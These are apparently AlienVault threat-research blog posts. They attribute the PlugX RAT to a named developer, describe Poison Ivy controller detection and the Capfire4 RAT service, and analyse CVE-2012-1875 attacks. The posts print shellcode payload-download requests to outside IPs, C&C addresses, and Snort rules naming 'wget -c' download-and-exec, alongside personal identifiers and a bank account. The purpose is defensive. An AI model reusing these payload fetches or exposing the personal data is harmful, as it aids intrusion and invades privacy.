
Tracking down the author of the PlugX RAT

September 13th, 2012 | Posted by jaime.blasco in APT | Attacks | News - (Comments Off)

Some days ago, TrendMicro published some information about a new version of a RAT called PlugX. Over the last few months we have been tracking a group using the PlugX RAT that has been attacking different targets, especially in Japan, Taiwan and Korea, and against Tibetan organizations and individuals.

In this post we will focus on the intelligence we have extracted from the payloads of the attacks and on how we used this information to track the author of the RAT, who is very likely involved in the attacks as well.

During the past few months we have seen some spearphishing campaigns against Tibetan targets using mainly Microsoft Office exploits (CVE-2012-0158). Those documents used a very tricky technique: the payload dropped was a benign Nvidia executable (NvSmart.exe), a DLL (NvSmartMax.dll) and a binary file (boot.ldr). This technique was explained by Symantec as well.

NvSmart.exe

https://www.virustotal.com/file/523d28df917f9d265cd2c0d38df26277bc56a535145100ed82e6f5fdeaae7256/analysis/

 

As we can see, the binary file is signed by Nvidia, since it is a benign file used by some Nvidia applications. Once NvSmart.exe is executed, it loads NvSmartMax.dll. The attackers drop a modified version of NvSmartMax.dll which executes the binary content of boot.ldr, the file that contains the actual malicious code.

Since NvSmart.exe is configured to run when the computer starts and carries a valid digital signature, it bypasses some OS restrictions and the malicious code is executed every time the system boots.

Once the payload is executed, a decoy file is shown to the user as in most of the attacks we have seen in the past few years.

Here is an example of some of the decoy content used by the attackers:


It turns out that in most of the boot.ldr files we found the RAT called PlugX.

At the beginning of our investigation some months ago, we found that from some of the PlugX binaries we were able to extract debug paths like:

Hash: c1c80e237f6fbc2c61b82c3325dd836f3849ca036a28007617e4e27ba2f16c4b

Debug Path: d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XPlug.h

Compilation date: 6/17/2012 16:44:58

 

Hash: 1a091c2ddf77c37db3274f649c53acfd2a0f14780479344d808d089faa809a_HHDL’s Birthday Celebration.doc

Debug Path: d:\work\Plug3.0(Gf)UDP\Shell6\Release\Shell6.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 42813b3a43611efebf56239a1200f8fc96cd9f3bac35694b842d9e8b02a

Debug Path: d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h

Compilation date: 5/26/2012 7:16:08

 

Hash: 28762c22b2736ac9728feff579c3256bd5d18bdfbf11b8c00c68d6bd905af5b8

Debug Path: d:\work\plug3.1(icesword)\shellcode\shellcode\XPlug.h

Compilation date: 6/14/2012 6:06:00

It seems that there are several versions of the RAT, and if you take a look at the binaries you will notice changes and new capabilities in each version.

We searched through our collection to see if we could find other XPlug samples apart from the ones dropped by the malicious documents we had. We found these other samples:

Hash: 3b01677582e7a56942a91da9728c6251- financial_report.exe

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 60ee900d919da8306b7b6dbe7e62fee49f00ccf141b2e396f5a66be51a00e34f

Debug Path: C:\Documents and Settings\whg\\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 2012-03-12 07:04:12

 

Hash: c00cd2dcddbb24383a3639ed56e68a24dc4561b1248efa4d53aa2b68220b4b2a

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 3/12/2012 14:23:58

As we can see, the debug paths found in those files are a bit more interesting, since the path contains a username, "whg". We have two different paths, "C:\Documents and Settings\whg\" and "C:\Users\whg\", so it is likely that in the first case the author is using a Windows XP system and in the second one a Vista/7 system.

With this information, we began to search for binary files that contain similar debug paths. Our search turned up an application called SockMon that led us to http://www.cnasm.com/view.asp?classid=49&newsid=320 and http://www.cnasm.com/view.asp?classid=49&newsid=315.

The debug paths we found in files belonging to different SockMon versions are the following:

C:\Users\whg\Desktop\SockMon2011\SockMon\UnitCache.pas

c:\Documents and Settings\whg\SockMon2010\RunProtect\Release\RunProtect.pdb

c:\Documents and Settings\whg\\SockMon2010\SmComm\Release\SmComm.pdb

We also found another library called vtcp (http://www.cnasm.com/vtcpsdk/) that contains the following debug path:

C:\Users\whg\Desktop\vtcp11.0lib\vtcpT0\UnitMain.pas

Does this all look familiar to you? It seems that the user "whg" compiled these components, and he is also running a couple of machines whose profile paths correspond to the ones we found in the XPlug RAT.
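As an added example (not code from the original post), here is a small Python triage helper that pulls debug paths out of raw sample bytes, profiles the username and Windows generation the same way the post does, and clusters samples by the embedded username. The byte strings in SAMPLES are constructed around the paths quoted above; PATH_RE, extract_debug_paths, profile_path and cluster_by_user are this example's own names.

```python
import re
from collections import defaultdict

# Windows source/PDB paths as they sit in a PE's CodeView record or in leftover
# source strings. The regex and everything below are constructed for this example.
PATH_RE = re.compile(
    rb"[A-Za-z]:\\[\x20-\x7e]{1,240}?\.(?:pdb|h|cpp|pas)\b", re.IGNORECASE)

# Constructed sample blobs: a few filler bytes around the debug paths quoted
# in the post (real samples carry the path inside the debug directory).
SAMPLES = {
    "HHDL_birthday.doc-payload": b"\x00\x00d:\\work\\Plug3.0(Gf)UDP\\Shell6\\Release\\Shell6.pdb\x00",
    "nvsmart-boot.ldr": b"\x90\x90d:\\work\\plug4.0(nvsmart)\\shellcode\\shellcode\\XPlug.h\x00",
    "financial_report.exe": b"\x00C:\\Users\\whg\\Desktop\\Plug\\FastGui(LYT)\\Shell\\Release\\Shell.pdb\x00",
    "sample-60ee900d": b"\x00C:\\Documents and Settings\\whg\\\\Plug\\FastGui(LYT)\\Shell\\Release\\Shell.pdb\x00",
    "FamHook.dll": b"\x00c:\\Documents and Settings\\whg\\Pnw(all)\\Pc()\\FamHook\\Release\\FamHook.pdb\x00",
}

def extract_debug_paths(data: bytes) -> list:
    """Return every distinct path-looking string in the blob, decoded as latin-1."""
    return sorted({m.group(0).decode("latin-1") for m in PATH_RE.finditer(data)})

def profile_path(path: str) -> dict:
    """Pull the username, Windows generation and top-level project dir out of a path."""
    parts = [p for p in path.split("\\") if p]   # doubled backslashes yield empty parts
    lower = [p.lower() for p in parts]
    user = windows = None
    if len(parts) > 2 and lower[1] in ("users", "documents and settings"):
        user = parts[2]
        # C:\Users\ exists from Vista on; C:\Documents and Settings\ is XP/2003
        windows = "Vista/7" if lower[1] == "users" else "XP/2003"
        rest = parts[3:]
        if rest and rest[0].lower() == "desktop":
            rest = rest[1:]
    elif len(parts) > 1 and lower[1] == "work":
        rest = parts[2:]
    else:
        rest = parts[1:]
    project = rest[0] if rest else None
    return {"path": path, "user": user, "windows": windows, "project": project}

def cluster_by_user(samples: dict) -> dict:
    """Group sample names by the username embedded in their debug paths."""
    groups = defaultdict(set)
    for name, blob in samples.items():
        for path in extract_debug_paths(blob):
            info = profile_path(path)
            if info["user"]:
                groups[info["user"]].add(name)
    return {user: sorted(names) for user, names in groups.items()}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        for path in extract_debug_paths(blob):
            print(name, profile_path(path))
    print(cluster_by_user(SAMPLES))
```

The same scan works on real files by reading them with open(path, "rb") and passing the bytes to extract_debug_paths.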

If we take a look at cnasm.com we can find the following contact information:

email: whg0001 at 163.com

QQ: 312016

So the mail address also coincides with the username we found in the debug paths of the RAT samples.

Let's see what we can find about whg0001 at 163.com. The mail address was used as the administrative contact of the domain chinansl.com back in 2000:

Domain Name      : chinansl.com

PunnyCode        : chinansl.com

Creation Date    : 2000-08-08 00:00:00

Updated Date     : 2012-02-29 11:26:22

Expiration Date  : 2013-08-08 00:00:00

 

Registrant:

Organization   : chinansl technology co.,itd

Name           : lishiyun

Address        : Room E8BC , XiangFu Garden , 3rd Southern portion of 2nd ringroad , Chengdu , Si

City           : chengdushi

Province/State : sichuansheng

Country        : china

Postal Code    : 610041

 

Administrative Contact:

Name           :

Organization   : chinansl technology co.,itd

Address        :

City           : chengdushi

Province/State : sichuansheng

Country        : china

Postal Code    : 610041

Phone Number   :

Fax            : 086-028-85459578

Email          : whg0001@163.com

At this link you can find more information about the company. Overview:

Company Name: CHINANSL TECHNOLOGY CO.,LTD.

Address: Chengdu National Information Security Production Industrialization Base , 2nd Floor ,No.8 Chuangye   Road

Telephone: 02866853362

Custom Code: 5101730218773

Company Code: 730

Account-opening Bank: Xisanqi Sub-branch, Beijing Branch, Bank of China

Account Name: Beijing Lingtong Economic Consulting Co., Ltd

Account Number: 813715881608091001


From the information we collected, it seems to be a Chinese company related to the security industry. Of course!

We also found a software component called "Parent Carefree Filter":

https://www.virustotal.com/file/3babb326615b899e976a1a9dc51ec04118701a5de702494f1d363194060c5db7/analysis/

publisher: CHINANSL

product: Parent Carefree Filter

internal name: FamHook

file version: 3, 0, 0, 1

original name: FamHook.dll

copyright: CHINANSL

description: Parent Carefree Filter

And of course we found a similar debug path in the file:

c:\Documents and Settings\whg\Pnw(all)\Pc()\FamHook\Release\FamHook.pdb

You can find some advisories that Chinansl published back in 2000 and 2001:

CHINANSL Security Advisory(CSA-200110)

Tomcat 4.0-b2 for winnt/2000 show “.jsp” source Vulnerability

CHINANSL Security Advisory(CSA-200011)

PHP AND APACHE Vulnerability

CHINANSL Security Advisory(CSA-200012)

Ultraseek Server 3.0 Vulnerability

CHINANSL Security Advisory(CSA200013)

IBM WCS local user exceed his authority to access another file

CHINANSL Security Advisory(CSA-200105)

Tomcat 3.0 for win2000 Directory traversal Vulnerability

CHINANSL Security Advisory(CSA-200106)

JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability

CHINANSL Security Advisory(CSA-200108)

Tomcat 3.2.1 for win2000 Directory traversal

CHINANSL Security Advisory(CSA-200107)

IBM WCS 4.0.1 + Application Server 3.0.2 for Solaris 2.7 show “.jsp” source Vulnerability.

CHINANSL Security Advisory(CSA-200109)

Tomcat 4.0-b1 for winnt/2000 show “.jsp” source Vulnerability.

 

There are also several references to whg0001 on the Internet:

https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=54500

http://bbs.krshadow.com/thread-58032-1-1.html

They describe him as "Virus expert. Proficient in assembly."

And finally, here is the CSDN profile where you can find a photo of him:


At this point you must be thinking that we cannot accuse whg of being related to the XPlug RAT and the targeted campaigns just because of a couple of debug paths inside the binaries, can we?

OK, here is the final touch. After searching for more versions of the PlugX RAT we found these two samples:

2ba7f1cc1f46a17ccfbef6b327d8c4e47f9d56922debcad27e5db569f4cf818d

51e50d810172591ee04e12cfce0792f3154356588eacadc01288e3a4fda915fb

They contain this debug path:

i:\work\plug2.0()\shellcode\shellcode\XPlug.h

and the following URL:

http://tieba.baidu.com/f?kz=866965377

that seems to be used as a test or to check connectivity (more info in future posts).

Surprisingly when you open the URL you can see the following:


Is this guy familiar to you?

With the information we have, we can say that this guy is behind the active development of the PlugX RAT. We can also say that he probably has some insight into the operations, since the path "d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h" tells us that he knew the RAT was going to be weaponized through the NvSmart technique used in the spearphishing campaigns.

According to the information in this research, a previous version of this malware, also called Thoper/Tvt/Sogu, was used to compromise SK Communications in South Korea back in 2011.


jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.


I want to share with you an Nmap script that will help you detect Poison Ivy clients (due to the Poison Ivy nomenclature, the term "client" refers to the malicious server where the victims connect in order to receive commands).

The Poison Ivy protocol uses a challenge-response handshake to perform the authentication. The server (victim) sends an unencrypted 256-byte random challenge to the client (malicious server). Once the client receives the challenge, it encrypts the data and sends the response back to the server. The encryption uses the Camellia block cipher, which has a 16-byte block size.

I have written a small Nmap script that sends the challenge to the client and expects a 256-byte response. It is able to detect whether the Poison Ivy password in use is the default one ("admin").

Sample output:

jaime$ ./nmap -P0 -v --script=poison -p3460 192.168.1.38

Starting Nmap 6.01 ( http://nmap.org ) at 2012-07-06 12:12 CEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Parallel DNS resolution of 1 host. at 12:12
Completed Parallel DNS resolution of 1 host. at 12:12, 0.10s elapsed
Initiating Connect Scan at 12:12
Scanning 192.168.1.38 [1 port]
Discovered open port 3460/tcp on 192.168.1.38
Completed Connect Scan at 12:12, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.1.38.
Initiating NSE at 12:12
Completed NSE at 12:12, 0.01s elapsed
Nmap scan report for 192.168.1.38
Host is up (0.00067s latency).
PORT     STATE SERVICE
3460/tcp open  unknown
|_poison: Poison Ivy client detected with default password, admin

 

I hope you enjoy it!

References: http://badishi.com/own-and-you-shall-be-owned/

Update: Thanks to @badishi for pointing out that we can also check the next 4 bytes after the response (d0 15 00 00), which do not depend on the key.
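As an added example, not the Nmap script from the post, here is the same probe logic in Python: it connects like a victim would, sends a random 256-byte challenge, reads the 256-byte reply plus the four key-independent trailer bytes (d0 15 00 00) mentioned in the update, and classifies the result. The Camellia check for the default password is not reproduced; classify_response, probe and fake_listener are this example's own names, and fake_listener is a constructed loopback stand-in used only for offline testing.

```python
import os
import socket
import threading

CHALLENGE_LEN = 256             # size of the Poison Ivy challenge described in the post
TRAILER = b"\xd0\x15\x00\x00"   # key-independent bytes that follow the 256-byte response

def _recv_exact(sock, n):
    """Read up to n bytes, stopping early if the peer closes or the socket times out."""
    buf = b""
    while len(buf) < n:
        try:
            chunk = sock.recv(n - len(buf))
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf

def classify_response(data: bytes):
    """Apply the two checks a probe can make without knowing the password."""
    if len(data) < CHALLENGE_LEN:
        return None                                 # too short: not a Poison Ivy handshake
    if data[CHALLENGE_LEN:CHALLENGE_LEN + len(TRAILER)] == TRAILER:
        return "Poison Ivy client detected (key-independent trailer d0 15 00 00 matched)"
    return "256-byte reply received, trailer not seen (possible Poison Ivy client)"

def probe(host: str, port: int, timeout: float = 3.0):
    """Send a random challenge and classify whatever comes back."""
    challenge = os.urandom(CHALLENGE_LEN)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(challenge)
        reply = _recv_exact(s, CHALLENGE_LEN + len(TRAILER))
    return classify_response(reply)

def fake_listener(reply: bytes) -> int:
    """Constructed stand-in for a Poison Ivy client on loopback; returns the bound port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            _recv_exact(conn, CHALLENGE_LEN)        # consume the challenge, ignore its content
            conn.sendall(reply)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port

if __name__ == "__main__":
    port = fake_listener(os.urandom(CHALLENGE_LEN) + TRAILER)
    print(probe("127.0.0.1", port))
```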


A large share of the malware out there consists of RAT (Remote Administration Tool) samples. This is software created by people who specialize in it: people who develop, improve and sell their tools. It has capabilities that let the attacker spy on the victims through actions like screen capturing, keylogging, password stealing, command execution, and remote access and control.

Their clients usually pay to gain access to the tools and to additional services like support, zero or low antivirus detection, and so on.

We are going to look at a service we have been studying recently. Clients pay for the service and then gain access to a web portal where they can generate personalized Trojans, manage the infected victims from the web browser and host the malware on the provider's "cloud".

The creators promote it as a service to remotely control computers and "recover passwords".

This means that clients barely have to deal with any technical issues, and they need no special skills or knowledge. The providers supply the tools, the hosting, and the Command and Control server.

When you log in to your personal account you can see the main menu, tutorials and shortcuts.

The control panel uses HTTPS with a valid certificate.

Then you can create a new personalized piece of malware (a Trojan horse), which is generated in real time.

They take care of the antivirus detections for you. Created samples have a very low antivirus detection ratio (2/42).

Then comes the time to host the malware. Clients can choose between some fake domains that seem legitimate. The administrator of the service has bought two domains to create the fake subdomains:

cf.pro.br
as.bio.br

The whois data of the main website is hidden, but the two domains we just mentioned are not. This way we can discover some information about the authors:

http://whois.domaintools.com/cf.pro.br


domain: cf.pro.br
owner: Pedro Henrique
ownerid: 401.407.278-92
country: BR
created: 20090510
changed: 20100713

Finally, once the targets are infected, you can easily manage your victims. You can perform remote control of the machine, password stealing and command execution. The available actions include:

Uninstall software, Reboot, Logoff user, Kill process, Send DOS command, Download an execute file, Open web page.

If you need to infect more targets, you will have to pay for them.

Malware communication with the C&C is done over HTTP. For command execution they use a different protocol on port 9000.

The C&C IP is in Brazil and is always the same; it is included in our IP reputation database: 174.142.93.226.

You can use the following rules to detect the communication traffic and command execution requests:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE Capfire4 register machine"; flow:to_server,established; content:"GET"; depth:3; uricontent:"/registraMaquina"; content:"Host|3A| api|2E|capfire4|2E|com"; http_header; classtype:trojan-activity; sid:5000080; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE Capfire4 update machine status"; flow:to_server,established; content:"POST"; depth:4; uricontent:"/updMaqStatus"; content:"Host|3A| api|2E|capfire4|2E|com"; http_header; classtype:trojan-activity; sid:5000081; rev:1;)

alert tcp $EXTERNAL_NET 9000 -> $HOME_NET any (msg:"MALWARE Capfire4 remote command execution"; flow:to_server,established; content:"|10|"; depth:1; content:"|14|"; distance:1; within:1; content:".exe"; classtype:trojan-activity; sid:5000082; rev:1;)

alert tcp $EXTERNAL_NET 9000 -> $HOME_NET any (msg:"MALWARE Capfire4 remote kill process"; flow:to_server,established; content:"|10|"; depth:1; content:"|14|taskkill"; distance:1; within:9; classtype:trojan-activity; sid:5000083; rev:1;)

alert tcp $EXTERNAL_NET 9000 -> $HOME_NET any (msg:"MALWARE Capfire4 remote download and exec"; flow:to_server,established; content:"|10|"; depth:1; content:"|14|wget -c"; distance:1; within:8; classtype:trojan-activity; sid:5000084; rev:1;)

As a conclusion, we can say that easy-to-use frameworks for monetizing malware are becoming more and more popular on the Internet, as they let people without technical skills manage their victims with ease.

Ongoing attacks exploiting CVE-2012-1875

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware - (Comments Off)

Yesterday, Microsoft released the June 2012 Black Tuesday update, including patches for a vulnerability affecting a wide range of Internet Explorer versions. The exploit works across different Windows versions, from XP to Windows 7.

The 0day has been actively exploited, as reported by McAfee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

 

The exploit includes return-oriented programming (ROP) techniques that help bypass OS protections.


The shellcode downloads the payload from the following URL:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/


A couple of days ago the AV detection rate was 3/41.

 

Other versions of the exploit have been found on different servers, requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/


The payloads seem to be RATs (Remote Access Tools).

The C&C server for that RAT is online (IP address 219.90.117.132):

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we have analyzed the components involved in this attack.
